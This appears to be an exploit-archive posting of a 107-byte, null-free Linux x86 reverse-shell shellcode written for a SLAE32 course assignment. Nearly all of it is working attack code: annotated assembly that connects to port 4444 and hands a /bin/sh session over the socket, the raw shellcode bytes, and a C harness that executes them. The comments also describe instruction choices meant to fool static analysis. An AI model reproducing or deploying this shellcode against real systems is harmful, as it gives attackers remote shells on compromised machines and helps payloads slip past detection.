linuxx86 reverse ( shell (binsh) + nullbyte free shellcode (107 bytes)

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linuxx86 reverse ( shell (binsh) + nullbyte free shellcode (107 bytes) Code Code...
/* ; name : Exploit Title: Linux/x86 - TCP reverse shell nullbyte free ; date : 04th sept, 2019 ; author : Sandro "guly" Zaccarini ; twitter : @theguly ; blog : ; SLAE32 : SLAE-1037 ; purpose : the program will create a new connection to and spawns a shell ; this code has been written as extramile for SLAE32 assignment 2 ; license : CC-BY-NC-SA global _start section .text _start: ; start by zeroing eax,ebx. not really needed because registers are clean, but better safe than sorry xor eax,eax xor ebx,ebx ; ---------------------------------------------------------------------------------------- ; purpose : create a socket ; references : man socket ; description : ; socketcall is the syscall used to work with socket. i'm going to use this syscall to create and connect ; the very first thing i have to do, is to create the socket itself. by reading references, i see that she needs 3 registers: ; eax => syscall id 0x66 for socketcall, that will be the same for every socketcall call of course and that's why i created a function on top ; ebx => socket call id, that is 0x1 for socket creation ; ecx => pointer to socket args ; ; man socket shows me that socket's args are: ; domain => AF_INET because i'm creating a inet socket, and is 0x2 ; type => tcp is referenced as STREAM, that is 0x1 ; protocol => unneded here because there is no inner protocol, so i'll use 0x0 ; not, i'm creating ecx because a zeroed eax is perfect for the purpose ; arg will be pushed in reverse order with no hardcoded address: 0, 1, 2 push eax inc eax push eax inc eax push eax ; because socketcall needs a pointer, i'm moving esp address to ecx mov ecx,esp ; prepare eax to hold the socketcall value as discussed before. i'm not hardcoding 0x66 to (try to) fool some static analysis: 0x33 is sysacct and looks harmless to me mov al,0x33 add al,0x33 ; because ebx has been zeroed, i can just inc to have it to 1 for socketcall to call socket (pun intended :) ) inc ebx ; do the call and create socket int 0x80 ; because syscall rets to eax, if everything's good, eax will hold socket file descriptor: save it to esi to store it safe for the whole run mov esi,eax ; ---------------------------------------------------------------------------------------- ; purpose : connect to raddr:rport ; references : man connect , man 7 ip ; description : ; eax => syscall id 0x66 for socketcall ; ebx => connect call id, 0x3 taken from linux/net.h ; ecx => pointer to address struct ; ; man connect shows me that args are: ; sockfd => already saved in esi ; address => pointer to ip struct ; addrlen => addrlen is 32bit (0x10) ; ; man 7 ip shows address struct details. arguments are: ; family => AF_INET, so 0x2 ; port => hardcoded 4444 ; addr => ; zero again xor eax,eax ; push arg in reverse and move the pointer to ecx ; prepare stack pointer to addr struct defined in man 7 ip ; as exercise, i'm going to use as remote address, because it contains null bytes ; hex value of is 0x0100007f ; pushing 0x00000000 to esp by using a known null register. i've also could used sub esp,0x8 because i have enough room, or mov eax,[esp] or another zillion of similal instructions push eax mov byte [esp], 0x7f ; now esp is: 0x0000007f mov byte [esp+3],0x01 ; now esp is: 0x0100007f ; push port to bind to, 4444 in hex, to adhere to msf defaults :) push word 0x5c11 ; push AF_INET value as word again inc ebx push word bx ; get stack pointer to ecx mov ecx,esp ; same call to have 0x66 to eax and do socketcall mov al,0x33 add al,0x33 ; push arg, again in reverse order push eax ; pointer to addr struct push ecx ; sockfd, saved before to esi push esi ; stack pointer to ecx again, to feed bind socketcall mov ecx,esp ; ebx is 0x2, i need 0x3 inc ebx ; do the call int 0x80 ; ---------------------------------------------------------------------------------------- ; purpose : create fd used by /bin//sh ; references : man dup2 ; description : every shell has three file descriptor: STDIN(0), STDOUT(1), STDERR(2) ; this code will create said fd ; eax => 0x3f ; ebx => clientid ; ecx => newfd id, said file descriptor ; ; i'm going to create them by looping using ecx, to save some instruction. ecx will start at 2, then is dec and fd is created. ; as soon as ecx is 0, the loop ends ; i'm using a different method from one i've used for bindshell just to try. ; i'll put 0x3 to ecx to start creating STDERR just after dec ; ecx is dirty but edx is 0x0, just swap them ; edit: actually, running from a C code you'll have edx dirty. zero it... xor edx,edx xchg ecx,edx mov cl,0x3 ; copy socket fd to ebx to feed clientid mov ebx,esi ; zero eax and start the loop xor eax,eax ; dup2 call id mov al,0x3f ; dec ecx to have 2,1,0 dec ecx int 0x80 mov al,0x3f ; dec ecx to have 2,1,0 dec ecx int 0x80 mov al,0x3f ; dec ecx to have 2,1,0 dec ecx int 0x80 ; ---------------------------------------------------------------------------------------- ; purpose : spawn /bin//sh ; references : man execve ; description : put /bin//sh on the stack, aligned to 8 bytes to prevent 0x00 in the shellcode itself ; and null terminating it by pushing a zeroed register at first ; eax => execve call, 0xB ; ebx => pointer to executed string, which will be /bin//sh null terminated ; ecx => pointer to args to executed command, that could be 0x0 ; edx => pointer to environment, which could be 0x0 ; ; i need to push a null byte to terminate the string, i know ecx is 0x0 so i can save one op push ecx push 0x68732f2f push 0x6e69622f ; here the stack will looks like a null terminated /bin/sh: ; /bin//sh\0\0\0\0\0\0\0\0 ; and place pointer to ebx mov ebx,esp ; envp to edx and ecx push ecx mov edx,esp push ecx mov ecx,esp ; execve syscall here mov al,0xB ; and pop shell int 0x80 ; neat exit xor eax,eax mov al,0x1 int 0x80 */ #include <stdio.h> #include <string.h> unsigned char buf[] = "\x31\xc0\x31\xdb\x50\x40\x50\x40\x50\x89\xe1\xb0\x33\x04\x33\x43\xcd\x80\x89\xc6\x31\xc0\x50\xc6\x04\x24\x7f\xc6\x44\x24\x03\x01\x66\x68\x11\x5c\x43\x66\x53\x89\xe1\xb0\x33\x04\x33\x50\x51\x56\x89\xe1\x43\xcd\x80\x31\xd2\x87\xca\xb1\x03\x89\xf3\x31\xc0\xb0\x3f\x49\xcd\x80\xb0\x3f\x49\xcd\x80\xb0\x3f\x49\xcd\x80\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x51\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80"; void main() { printf("Shellcode Length: %d\n", strlen(buf)); int (*ret)() = (int(*)())buf; ret(); }

Linuxx86 reverse ( shell (binsh) + nullbyte free shellcode (107 bytes) Vulnerability / Exploit Source : Linuxx86 reverse ( shell (binsh) + nullbyte free shellcode (107 bytes)

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